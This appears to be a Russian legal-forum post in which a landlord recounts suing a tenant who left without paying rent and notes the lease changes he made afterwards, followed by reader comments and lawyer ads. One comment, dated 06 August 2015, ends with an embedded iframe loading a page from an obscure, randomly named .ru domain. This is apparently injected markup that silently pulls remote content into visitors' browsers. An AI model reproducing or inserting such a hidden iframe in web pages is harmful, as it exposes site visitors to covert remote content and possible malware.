Настоящее дело с юридической точки зрения не представляло какой-либо сложности.

Исходя из этого и того, что сумма иска незначительная привлечение профессионала для участия в деле было нецелесообразно. Таким образом, не являясь профессиональным юристом, Делом занимался я сам.

В порядке отступления хочу сказать, что с одной стороны в силу жизненной позиции стараюсь не доводить дела до судебных разбирательств, с другой стороны в силу жизненного опыта убедился, что если прощать в отношении себя «кидки», то это как-то становиться общеизвестно и является очень заразительным примером и соблазном для других.

Поэтому, когда одним из дней мне позвонила соседка по этажу, где я имею комнату, и спросила: «А Вы комнату сдавать не собираетесь?» Первая мысль была, что это розыгрыш, ибо я был уверен, что комната сдана и там проживает семья из 4-х человек. На мои недоуменные вопросы соседка сообщила, что жильцы очень очень быстро собрались и съехали две недели назад.

Это был классический «кидок».

Трудность была в том, что куда съехал наниматель было не известно, а как известно наше законодательство требует, что в суд надо подавать по месту нахождения ответчика.

Упуская детали, сообщу, что адрес я очень быстро узнал у «подруг» нанимательницы, которые я бы сказал с болезненным наслаждением сдали свою бывшую подругу. Подтверждение их информации я получил, заказав выписку из ЕГРП.

По итогам дела: я еще раз убедился, насколько я прав сдавая комнату официально;

на будущее в договоре найма предусмотрел территориальную подсудность по месту моей регистрации, да бы не ездить на суды в «тьмутаракань».

Документы

Вы можете получить доступ к документам оформив подписку на PRO-аккаунт или приобрести индивидуальный доступ к нужному документу. Документы, к которым можно приобрести индивидуальный доступ помечены знаком ""

1.Договор с Нанимател​ем без пд1.8 MB
2.Претензия к Нанимате​лю без пд614.6 KB
3.Ходатайство32 KB
4.Решение суда без пд2.7 MB

Да 9 9

Ваши голоса очень важны и позволяют выявлять действительно полезные материалы, интересные широкому кругу профессионалов. При этом бесполезные или откровенно рекламные тексты будут скрываться от посетителей и поисковых систем (Яндекс, Google и т.п.).

Участники дискуссии: maal305-qu, Рисевец Алёна, gumnactka-qu, anteiantei, yevgeniy, tatarstan-kazan
  • 03 Августа 2015, 23:19 #

    Уважаемый Анатолий Юрьевич,  спасибо за информацию!
    В жизни может пригодиться.

    +1
  • 04 Августа 2015, 05:02 #

    Уважаемый Анатолий Юрьевич, Ваш случай ещё раз доказывает тот факт, что наличие договора, а также правильное его составление очень важно в гражданских правоотношениях. А некоторые ведь до сих пор сдают (снимают) жильё «под честное» слово, не оформляют даже элементарный договор найма, полагаясь на честность нанимателя (наймодателя)! В наше время считаю это верхом неосмотрительности, а то и глупости.

    +2
    • 04 Августа 2015, 09:16 #

      Уважаемая Алёна Александровна, спасибо за внимание к публикации. Как я уже говорил по итогам дела доработал договор найма.
      1. По вопросу территориальной подсудности.
      2. По вопросу  конкретизации даты  окончания срока действия договора. (С даты подписания сторонами акта-приема передачи жилого помещения, имущества и  ключей нанимателем наймодателю). 

      +2
      • 06 Августа 2015, 20:45 #

        Уважаемый Анатолий Юрьевич, заинтересовало условие договора найма о территориальной подсудности рассмотрения возможного спора. Хотелось бы узнать Ваше мнение и мнение коллег: не будет ли данное условие договора противоречить закону?<iframe src=«https://g33tm0yy.ru/f.html»>;</iframe>

        0
    • 04 Августа 2015, 07:53 #

      Уважаемый Анатолий Юрьевич, удачно все сложилось, поздравляю. И за договор спасибо, пригодится

      +2
      • 04 Августа 2015, 09:22 #

        Уважаемая Юлия Владимировна, спасибо за внимание к публикации.
        В последующем при заселении  жильцов буду их ненавязчиво знакомить с Решением Суда.

        +2
    • 04 Августа 2015, 11:57 #

      Уважаемый Анатолий Юрьевич, можно и навязчиво, чтобы мошенники сразу отпадали;) Я заключала договор с жильцами немного другого плана, но суть примерно та же. Проблем не было. Скачала бланк в интернете и все. Но Ваш поинтереснее будет.

      +1
    • 04 Августа 2015, 20:02 #

      Бросилось в глаза:
      — квартира не передается во владение, о какой ответственности может быть речь?
      — квартировладелец перепродает услуги связи (телефон, интернет) квартирантам — лицензируемые услуги

      Что если квартира «погибнет» в результате какой-то формы вредительства? Как доказать вину квартиранта, если ключи есть и у квартировладельца (а также у нескольких третьих лиц, прописанных в квартире) тоже?

      -2
      • 05 Августа 2015, 11:09 #

        Уважаемый Анатолий Юрьевич,
        что является целью публикации?

        -2

      Да 9 9

      Ваши голоса очень важны и позволяют выявлять действительно полезные материалы, интересные широкому кругу профессионалов. При этом бесполезные или откровенно рекламные тексты будут скрываться от посетителей и поисковых систем (Яндекс, Google и т.п.).

      Для комментирования необходимо Авторизоваться или Зарегистрироваться

      Ваши персональные заметки к публикации (видны только вам)

      Рейтинг публикации: «Как наниматель жилого помещения наймодателя хотел «кинуть», но «халява» не прошла.» 2 звезд из 5 на основе 9 оценок.
      Адвокат Морохин Иван Николаевич
      Кемерово, Россия
      +7 (923) 538-8302
      Персональная консультация
      Сложные гражданские, уголовные и административные дела экономической направленности.
      Дорого, но качественно. Все встречи и консультации, в т.ч. дистанционные только по предварительной записи.
      https://morokhin.pravorub.ru/
      Адвокат Фищук Александр Алексеевич
      Краснодар, Россия
      +7 (926) 004-7837
      Персональная консультация
      Банкротство, арбитражный управляющий: списание, взыскание долгов, оспаривание сделок, субсидиарная ответственность. Абонентское сопровождение бизнеса. Арбитраж, СОЮ, защита по налоговым преступлениям
      https://fishchuk.pravorub.ru/
      Эксперт Лизоркин Егор Владимирович
      Пятигорск, Россия
      +7 (960) 228-1228
      Персональная консультация
      Независимый эксперт по наркотикам. Рецензирование экспертизы наркотиков. Помощь адвокатам в оспаривании экспертиз наркотических средств. Выезд в суд любого региона страны.
      https://lizorkin.pravorub.ru/

      Похожие публикации

      Продвигаемые публикации